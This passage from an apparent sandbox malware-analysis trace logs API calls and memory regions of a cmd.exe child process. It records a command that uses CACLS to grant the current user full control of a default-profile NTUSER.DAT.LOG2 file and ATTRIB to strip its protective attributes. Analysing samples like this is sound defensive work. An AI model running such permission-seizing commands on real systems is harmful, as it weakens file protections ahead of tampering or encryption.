lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee10*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ee60*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18eeb0*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef00*, lpNumberOfBytesWritten=0x18df54*=0x50, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] GetFileType (hFile=0x4c) returned 0x1 [0215.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.723] WriteFile (in: hFile=0x4c, lpBuffer=0x18ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ef50*, lpNumberOfBytesWritten=0x18df54*=0x20, lpOverlapped=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.723] ReadFile (in: hFile=0x54, lpBuffer=0x18ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18df60, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesRead=0x18df60*=0x32, lpOverlapped=0x0) returned 1 [0215.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.724] GetFileType (hFile=0x4c) returned 0x1 [0215.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.724] GetFileType (hFile=0x4c) returned 0x1 [0215.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0215.724] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed70*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x18df54, lpOverlapped=0x0 | out: lpBuffer=0x18ed70*, lpNumberOfBytesWritten=0x18df54*=0x32, lpOverlapped=0x0) returned 1 [0215.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0215.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18df40 | out: lpNewFilePointer=0x0) returned 1 [0215.724] _close (_FileHandle=4) returned 0 [0215.724] FindNextFileW (in: hFindFile=0x1f0e30, lpFindFileData=0x18efd4 | out: lpFindFileData=0x18efd4) returned 0 [0215.724] GetLastError () returned 0x12 [0215.724] FindClose (in: hFindFile=0x1f0e30 | out: hFindFile=0x1f0e30) returned 1 [0215.725] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0215.810] _close (_FileHandle=3) returned 0 [0215.810] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.810] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.810] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.810] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.810] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.811] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.811] SetConsoleInputExeNameW () returned 0x1 [0215.811] GetConsoleOutputCP () returned 0x1b5 [0215.811] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.811] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.811] exit (_Code=0) Process: id = "542" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0xb28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31868 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31869 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31870 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31871 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31872 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31873 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31874 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31875 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31876 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 31877 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31974 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31975 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31976 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31977 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 31978 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 31979 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31980 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31981 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31982 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31983 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31984 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31985 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31986 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31987 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31988 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 31989 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31990 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31991 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31992 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31993 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31994 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31995 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 31996 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 31997 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 32046 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 744 os_tid = 0xa3c [0215.649] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa5c | out: lpSystemTimeAsFileTime=0x2efa5c*(dwLowDateTime=0xb5577f40, dwHighDateTime=0x1d440a9)) [0215.650] GetCurrentProcessId () returned 0xb28 [0215.650] GetCurrentThreadId () returned 0xa3c [0215.650] GetTickCount () returned 0x3c5ae [0215.650] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa54 | out: lpPerformanceCount=0x2efa54*=27243879338) returned 1 [0215.650] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.650] __set_app_type (_Type=0x1) [0215.650] __p__fmode () returned 0x76b331f4 [0215.650] __p__commode () returned 0x76b331fc [0215.650] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.650] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.650] GetCurrentThreadId () returned 0xa3c [0215.651] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa3c) returned 0x38 [0215.651] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.651] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.651] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.651] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.651] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef9ec | out: phkResult=0x2ef9ec*=0x0) returned 0x2 [0215.651] VirtualQuery (in: lpAddress=0x2efa23, lpBuffer=0x2ef9bc, dwLength=0x1c | out: lpBuffer=0x2ef9bc*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.651] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef9bc, dwLength=0x1c | out: lpBuffer=0x2ef9bc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.651] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef9bc, dwLength=0x1c | out: lpBuffer=0x2ef9bc*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.651] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef9bc, dwLength=0x1c | out: lpBuffer=0x2ef9bc*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.651] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef9bc, dwLength=0x1c | out: lpBuffer=0x2ef9bc*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.651] GetConsoleOutputCP () returned 0x1b5 [0215.651] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.651] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.651] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.651] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.652] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.652] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.652] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.652] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.652] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.652] GetEnvironmentStringsW () returned 0x4f0198* [0215.652] FreeEnvironmentStringsW (penv=0x4f0198) returned 1 [0215.652] GetEnvironmentStringsW () returned 0x4f0198* [0215.653] FreeEnvironmentStringsW (penv=0x4f0198) returned 1 [0215.653] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee95c | out: phkResult=0x2ee95c*=0x40) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0xc0, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x1, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0x1, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x0, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x40, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x40, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0x40, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegCloseKey (hKey=0x40) returned 0x0 [0215.653] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee95c | out: phkResult=0x2ee95c*=0x40) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0x40, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x1, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0x1, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x0, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x9, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x4, lpData=0x2ee968*=0x9, lpcbData=0x2ee960*=0x4) returned 0x0 [0215.653] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee964, lpData=0x2ee968, lpcbData=0x2ee960*=0x1000 | out: lpType=0x2ee964*=0x0, lpData=0x2ee968*=0x9, lpcbData=0x2ee960*=0x1000) returned 0x2 [0215.653] RegCloseKey (hKey=0x40) returned 0x0 [0215.653] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.653] srand (_Seed=0x5b8863b1) [0215.653] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"" [0215.653] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"" [0215.653] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.654] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0215.654] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.654] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.654] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.654] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0215.654] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0215.654] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0215.654] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0215.654] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0215.654] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0215.654] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0215.654] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0215.654] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0215.654] GetEnvironmentStringsW () returned 0x4f22e8* [0215.654] FreeEnvironmentStringsW (penv=0x4f22e8) returned 1 [0215.654] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.654] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0215.654] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0215.654] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0215.654] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0215.654] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0215.654] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0215.654] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0215.654] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0215.654] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0215.655] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef728 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.655] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef728, lpFilePart=0x2ef724 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef724*="Desktop") returned 0x18 [0215.655] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.655] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef4a4 | out: lpFindFileData=0x2ef4a4) returned 0x4f0028 [0215.655] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0215.655] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef4a4 | out: lpFindFileData=0x2ef4a4) returned 0x4f0028 [0215.655] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0215.655] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef4a4 | out: lpFindFileData=0x2ef4a4) returned 0x4f0028 [0215.655] FindClose (in: hFindFile=0x4f0028 | out: hFindFile=0x4f0028) returned 1 [0215.655] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.655] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.655] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.655] GetEnvironmentStringsW () returned 0x4f2b08* [0215.656] FreeEnvironmentStringsW (penv=0x4f2b08) returned 1 [0215.656] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.656] GetConsoleOutputCP () returned 0x1b5 [0215.656] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.656] GetUserDefaultLCID () returned 0x409 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef868, cchData=128 | out: lpLCData="0") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef868, cchData=128 | out: lpLCData="0") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef868, cchData=128 | out: lpLCData="1") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 